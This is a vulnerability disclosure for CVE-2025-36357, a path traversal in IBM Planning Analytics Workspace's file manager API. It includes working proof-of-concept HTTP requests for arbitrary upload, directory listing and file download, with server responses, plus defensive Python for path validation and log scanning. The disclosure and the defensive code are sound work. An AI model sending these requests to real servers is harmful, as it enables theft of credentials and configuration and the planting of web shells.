Prepared by: Anthony Lucas, Senior Offensive Consultant | Published: 26 May 2026
IBM Planning Analytics Workspace (PAW) is a web-based analytics and planning platform widely deployed in enterprise environments. During a security assessment, I identified a path traversal vulnerability in the application's built-in file manager that allows an authenticated attacker to read and write arbitrary files on the underlying Windows server — without any restriction on file extension, MIME type, or target directory.
This vulnerability was assigned CVE-2025-36357 with a CVSS base score of 8.0 (High).
IBM Planning Analytics Workspace versions 2.1.0 through 2.1.14 expose a file management API that allows users to upload, download, list, and manage files within the application's working directory. The vulnerability arises because the user-supplied filePath parameter is used as given, without being confined to that working directory, and because uploaded files are written without any check on their extension or MIME type.
Together, these weaknesses give an authenticated attacker full read and write access to the filesystem of the server running IBM Planning Analytics Workspace — including sensitive configuration files, credentials, and application internals.
| METHOD | ENDPOINT | PURPOSE |
|---|---|---|
| POST | /prism/harmony/tiprocess/api/v1/Servers('{SERVER}')/Processes/ImportFile | File upload |
| POST | /prism/harmony/tiprocess/api/v1/Servers('{SERVER}')/Processes/Files | File listing / directory browse |
| GET | /prism/harmony/tiprocess/api/v1/Servers('{SERVER}')/Processes/Files/Download | File download |
The file upload endpoint accepts a multipart form request containing three key parameters: tml_file (the file content), fileName (the filename), and filePath (the destination directory). During normal use, filePath is left empty, defaulting to the application's working directory. By supplying an absolute path in the filePath field, an attacker can redirect the upload to any writable location on the server filesystem.
Sanitised PoC Request:
POST /prism/harmony/tiprocess/api/v1/Servers('CXMD')/Processes/ImportFile HTTP/2
Host: target.example.com
Cookie: <SESSION_COOKIE>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary

------WebKitFormBoundary
Content-Disposition: form-data; name="tml_file"; filename="test.asp"
Content-Type: application/octet-stream

<script>alert(1)</script>
------WebKitFormBoundary
Content-Disposition: form-data; name="fileName"

test.asp
------WebKitFormBoundary
Content-Disposition: form-data; name="filePath"

C:\Temp
------WebKitFormBoundary
Content-Disposition: form-data; name="type"

PAA
------WebKitFormBoundary--
Server Response:
HTTP/2 200 OK
Content-Type: application/json

{
  "FilePath": "model_upload/C:\\Temp\\test.asp",
  "FileName": "test.asp"
}
The server confirms the file was written to C:\Temp\test.asp. No extension filtering, no MIME validation, no path restriction. The uploaded file contained a .asp payload, demonstrating the potential for server-side code execution if written to a web-accessible directory.
The file listing endpoint accepts a JSON body with a filePath parameter. By supplying a URL-encoded absolute path (e.g. %43%3a%5c = C:\), the server returns a full directory listing of the specified path — including folder names, file names, sizes, and last modified timestamps.
Sanitised PoC Request:
POST /prism/harmony/tiprocess/api/v1/Servers('CXMD')/Processes/Files HTTP/2
Host: target.example.com
Cookie: <SESSION_COOKIE>
Content-Type: application/json;charset=UTF-8

{
  "type": "PAA",
  "filePath": "%43%3a%5c"
}
Server Response (truncated):
[
{ "type": "folder", "path": "model_upload/C:\\Program Files", "name": "Program Files", "readable": true },
{ "type": "folder", "path": "model_upload/C:\\Program Files (x86)", "name": "Program Files (x86)", "readable": true },
{ "type": "folder", "path": "model_upload/C:\\Temp", "name": "Temp", "readable": true },
{ "type": "file", "path": "model_upload/C:\\test.asp", "name": "test.asp", "readable": true },
{ "type": "folder", "path": "model_upload/C:\\Users", "name": "Users", "readable": true },
{ "type": "folder", "path": "model_upload/C:\\Windows", "name": "Windows", "readable": true }
]
The server returns the full contents of C:\ — confirming the traversal reaches the root of the Windows drive.
The download endpoint accepts type, filePath, and fileName query parameters. By supplying a traversal path in filePath, an attacker can download any readable file from the server.
Sanitised PoC Request:
GET /prism/harmony/tiprocess/api/v1/Servers('CXMD')/Processes/Files/Download
?type=PAA
&filePath=%5cProgram%20Files%5cibm%5ccognos%5ctmlweb%5cconfiguration
&fileName=tmlpreserved.txt
&size=500 HTTP/2
Host: target.example.com
Cookie: <SESSION_COOKIE>
Server Response:
HTTP/2 200 OK
Content-Type: text/plain; charset=UTF-8
Content-Disposition: attachment; filename*=UTF-8''tmlpreserved.txt

# Files and directories to be preserved during an upgrade
configuration/tmlpreserved.txt
configuration/coglocale.xml
webapps/tmlweb/WEB-INF/configuration/tmlweb_config.xml
webapps/tmlweb/WEB-INF/web.xml
jre/lib/security/cacerts
bin64/ssl/tmlstore
bin64/ssl/ibmtml.crl
bin64/ssl/ibmtml.kdb
bin64/ssl/ibmtml.rdb
bin64/ssl/ibmtml.sth
wlp/usr/servers/tmlweb/jvm.options
wlp/usr/servers/tmlweb/server.xml
wlp/usr/servers/tmlweb/bootstrap.properties
The server successfully returned the contents of tmlpreserved.txt from the IBM Cognos installation directory, exposing internal configuration paths — including SSL keystores, web.xml, server.xml, and bootstrap.properties.
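All three endpoints share one root cause: the filePath value is used as given. The server-side check that closes them is also shared: decode the client-supplied value exactly once, refuse anything that carries a drive letter, a UNC prefix or a leading separator, canonicalise the result against the working directory, and confirm the canonical path still lies inside it; for uploads, additionally allowlist the extension. The Python below is an added example written for this write-up, not IBM's code, and it does not claim to reflect how PAW 2.1.15 implements its fix. The base directory C:\PAW\model_upload and the extension allowlist are assumed values; ntpath is used so the Windows path semantics hold wherever the example is run.

```python
import ntpath
from urllib.parse import unquote

# Assumed values for this example: the directory the file manager is meant to
# serve, and the extensions uploads are expected to carry. Neither comes from
# the IBM product; adjust both to the real deployment.
BASE_DIR = r"C:\PAW\model_upload"
ALLOWED_EXTENSIONS = {".csv", ".txt", ".json", ".xlsx"}


class PathRejected(ValueError):
    """Raised when a client-supplied filePath or fileName fails validation."""


def _decode_once(value: str) -> str:
    # Decode URL escapes exactly once, so "%43%3a%5c" is judged as "C:\".
    # A percent sign surviving that single decode points at double encoding.
    decoded = unquote(value or "")
    if "%" in decoded:
        raise PathRejected("percent-encoding remains after one decode")
    if "\x00" in decoded:
        raise PathRejected("NUL byte in path")
    return decoded


def resolve_managed_path(file_path: str, file_name: str, base_dir: str = BASE_DIR) -> str:
    """Map a file manager request onto a path inside base_dir, or raise PathRejected.

    Serves upload, listing and download alike: file_name may be empty for a
    directory listing, in which case the directory itself is returned.
    """
    rel_dir = _decode_once(file_path)
    name = _decode_once(file_name)

    # Drive letters ("C:\Temp"), UNC prefixes and rooted paths ("\Program Files")
    # are never legitimate relative to the working directory.
    drive, rest = ntpath.splitdrive(rel_dir)
    if drive or rest.startswith(("\\", "/")):
        raise PathRejected("absolute or rooted filePath")

    if name:
        # The filename must be a single path component with an allowed extension.
        if name in (".", "..") or "\\" in name or "/" in name or ntpath.splitdrive(name)[0]:
            raise PathRejected("fileName is not a plain filename")
        if ntpath.splitext(name)[1].lower() not in ALLOWED_EXTENSIONS:
            raise PathRejected("file extension not allowed")

    # Canonicalise (collapses "..", "." and forward slashes), then confirm the
    # result is still under the working directory. Checking after normalisation
    # is what makes "sub\..\..\Windows" fail even though it starts with neither
    # a separator nor a drive letter.
    base = ntpath.normpath(base_dir)
    candidate = ntpath.normpath(ntpath.join(base, rel_dir, name))
    if ntpath.commonpath([base, candidate]) != base:
        raise PathRejected("path escapes the working directory")
    return candidate


def is_request_allowed(file_path: str, file_name: str) -> bool:
    """Boolean form of the check, convenient for middleware and tests."""
    try:
        resolve_managed_path(file_path, file_name)
    except PathRejected:
        return False
    return True


if __name__ == "__main__":
    # Request shapes taken from the write-up, plus ordinary benign ones.
    for fp, fn in [("", "plan.csv"), ("2025/q1", "plan.xlsx"), ("C:\\Temp", "test.asp"),
                   ("%43%3a%5c", ""), ("\\Program Files\\ibm", "tmlpreserved.txt"),
                   ("sub\\..\\..\\Windows", "win.txt")]:
        try:
            print("allow ", resolve_managed_path(fp, fn))
        except PathRejected as exc:
            print("reject", repr(fp), repr(fn), "->", exc)
```

The containment test deliberately compares canonical paths rather than looking for ".." or a leading backslash in the raw string: string checks miss encoded and mixed-separator variants, while ntpath.commonpath on the normalised candidate catches every way of leaving the directory, including a sibling whose name merely shares the prefix (model_upload_old).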
An authenticated attacker who exploits this vulnerability can:
- Read any file on the server filesystem that the PAW service account has read access to — including configuration files, credentials, SSL certificates, and application secrets.
- Write arbitrary files to any writable location on the server — including web-accessible directories — with no restriction on file extension or content.
- Enumerate the full directory structure of the host, aiding further lateral movement and privilege escalation.
- Potentially achieve Remote Code Execution by writing a web shell (e.g. .asp, .aspx) to a directory served by IIS.
Given that IBM Planning Analytics Workspace typically runs with elevated service account privileges in enterprise environments, the blast radius of this vulnerability is significant.
IBM has addressed this vulnerability in IBM Planning Analytics Workspace 2.1.15. Users should upgrade immediately.
If an immediate upgrade is not possible, consider the following interim mitigations:
- Restrict network access to the PAW application to trusted internal networks only — prevent external or unauthenticated access to the API layer.
- Audit service account permissions — ensure the PAW service account runs with the minimum required filesystem privileges.
- Monitor for anomalous file activity — alert on file writes to sensitive directories (e.g. C:\Windows, C:\Program Files, IIS web roots) originating from the PAW service account.
- Review web server configuration — ensure no directories outside the intended PAW working directory are web-accessible.
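Monitoring for the third mitigation can also start at the HTTP layer rather than the filesystem, because every abuse of this bug passes a filePath value through one of the three endpoints listed earlier. The Python script below is an added example, not part of the original write-up and not IBM tooling. It assumes a reverse proxy or WAF in front of PAW that records, per request, the timestamp, client address, method, URI and the filePath field recovered from the request body (a tab-separated layout constructed for this example; the sample records are likewise constructed, with request shapes taken from the write-up and invented times and addresses). It flags values that decode to a drive letter, a rooted path or a ".." component, values still percent-encoded after one decode, and paths that name the directories the mitigation list singles out.

```python
import re
from typing import Dict, List
from urllib.parse import unquote

# The three file manager endpoints named in the write-up.
FILE_API = re.compile(
    r"^/prism/harmony/tiprocess/api/v1/Servers\('[^']*'\)/Processes/"
    r"(?P<op>ImportFile|Files/Download|Files)(?:\?|$)"
)
DRIVE_PREFIX = re.compile(r"^[A-Za-z]:")
# Directories the interim mitigation list singles out for monitoring.
SENSITIVE_DIR = re.compile(
    r"(?i)(?:^|[\\/])(?:windows|program files(?: \(x86\))?|inetpub)(?:[\\/]|$)"
)

# Constructed sample records (not real logs). Tab-separated fields: timestamp,
# client address, method, request URI, and the filePath taken from the request
# body for POSTs ("-" when there is none). Assumed proxy/WAF log layout.
SAMPLE_RECORDS = [
    "2026-05-26T10:00:01Z\t10.0.0.5\tGET\t/prism/harmony/tiprocess/api/v1/Servers('CXMD')/Processes/Files/Download?type=PAA&filePath=reports%2F2025&fileName=plan.csv\t-",
    "2026-05-26T10:02:14Z\t10.0.0.9\tPOST\t/prism/harmony/tiprocess/api/v1/Servers('CXMD')/Processes/Files\t%43%3a%5c",
    "2026-05-26T10:03:40Z\t10.0.0.9\tGET\t/prism/harmony/tiprocess/api/v1/Servers('CXMD')/Processes/Files/Download?type=PAA&filePath=%5cProgram%20Files%5cibm%5ccognos%5ctmlweb%5cconfiguration&fileName=tmlpreserved.txt&size=500\t-",
    "2026-05-26T10:05:02Z\t10.0.0.9\tPOST\t/prism/harmony/tiprocess/api/v1/Servers('CXMD')/Processes/ImportFile\tC:\\Temp",
    "2026-05-26T10:06:30Z\t10.0.0.9\tPOST\t/prism/harmony/tiprocess/api/v1/Servers('CXMD')/Processes/ImportFile\t..%5c..%5cWindows%5cTemp",
    "2026-05-26T10:07:11Z\t10.0.0.5\tGET\t/prism/harmony/tiprocess/api/v1/Servers('CXMD')/Processes/Files/Download?type=PAA&filePath=&fileName=notes.txt\t-",
    "2026-05-26T10:08:45Z\t10.0.0.5\tGET\t/prism/dashboards\t-",
]


def assess_file_path(raw: str) -> List[str]:
    """Return the traversal indicators present in one client-supplied filePath value."""
    indicators: List[str] = []
    if raw in ("", "-"):
        return indicators
    value = unquote(raw)  # decode exactly once, as the application would
    if "%" in value:
        indicators.append("double-encoding")
    if DRIVE_PREFIX.match(value):
        indicators.append("absolute-drive-path")
    elif value.startswith(("\\", "/")):
        indicators.append("rooted-path")
    if ".." in re.split(r"[\\/]", value):
        indicators.append("dot-dot-traversal")
    if SENSITIVE_DIR.search(value):
        indicators.append("sensitive-directory")
    return indicators


def _raw_query_params(uri: str) -> Dict[str, str]:
    """Split the query string without decoding, so assess_file_path decodes each value once."""
    _, _, query = uri.partition("?")
    params: Dict[str, str] = {}
    for pair in query.split("&"):
        key, _, val = pair.partition("=")
        if key:
            params[key] = val
    return params


def scan_records(lines) -> List[Dict[str, object]]:
    """Return one finding per file API request whose filePath carries an indicator."""
    findings: List[Dict[str, object]] = []
    for line in lines:
        ts, client, method, uri, body_file_path = line.rstrip("\n").split("\t")
        match = FILE_API.match(uri)
        if not match:
            continue  # not the file manager API
        # GET Download carries filePath in the query; the POST endpoints carry it in the body.
        raw = _raw_query_params(uri).get("filePath", "-") if method == "GET" else body_file_path
        indicators = assess_file_path(raw)
        if indicators:
            findings.append({"ts": ts, "client": client, "op": match.group("op"),
                             "filePath": unquote(raw), "indicators": indicators})
    return findings


if __name__ == "__main__":
    for f in scan_records(SAMPLE_RECORDS):
        print(f"{f['ts']} {f['client']} {f['op']:<14} {f['filePath']!r}: {', '.join(f['indicators'])}")
```

Because the two POST endpoints carry filePath in the body, a plain web server access log only sees the GET download requests; the body field has to come from a proxy or WAF that logs it, which is why the example expects that layout. After the upgrade to 2.1.15 the same scan still has value as a retrospective check for attempts made before patching.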
Time to patch: ~60 days from initial report.
CVE-2025-36357 — NVD
https://www.cve.org/CVERecord?id=CVE-2025-36357
The US government-backed catalogue of publicly disclosed vulnerabilities. This record covers a path traversal flaw in IBM Planning Analytics Local 2.1.0-2.1.14, CVSS 8.0 (High).
IBM Security Bulletin
https://www.ibm.com/support/pages/node/7251265
IBM's official vendor advisory portal. Confirms CVE-2025-36357 and related flaws; remediated in IBM Planning Analytics Workspace 2.1.15.